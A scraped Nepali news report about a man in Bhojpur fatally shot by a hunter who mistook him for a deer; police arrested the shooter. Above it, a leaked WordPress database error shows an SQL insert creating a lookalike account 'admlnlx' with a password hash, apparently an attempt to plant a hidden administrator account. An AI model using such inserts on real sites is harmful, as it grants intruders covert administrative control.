WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGUanFV06ENpVcxVZGbdzXKxmz3Qa51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:03:07', '', 'admlnlx', 'admlnlx')
भोजपुर, माघ ५ –
भोजपुरको उत्तरी दोभाने गाविसमा भरुवा बन्दुकले लागेर एकको ज्यान भएको छ । जंगलमा काठ काट्न गएका २७ वर्षे योगेन्द्र राईको भरुवा बन्दुकको गोली लागेर घटना स्थलमै ज्यान गएको हो ।दोभाने–८ को पेश्जा जंगलमा शिकार खेल्न गएका मदनबहादुर राईले मृग भनेर गोली चलाउँदा योगेन्द्र राईको घटना स्थलमा नै ज्यान गएको जिल्ला प्रहरी कार्यालय भोजपुरले जनाएको छ ।
योगेन्द्रको ज्यान गएपछि फरार रहेका मदनबहादुर राईलाई प्रहरीले पक्राउ गरी अनुसन्धान गरेको जनाएको छ । घटनास्थलबाट दुईथान भरुवा बन्दुक समेत बरामद गरेको प्रहरीले जनाएको छ । मदनबहादुर राई र योगेन्द्र राई दुबै जनाका काठ काट्न र सिकार खेल्न पुस २३ गत पेश्जा जंगलमा गएका थिए ।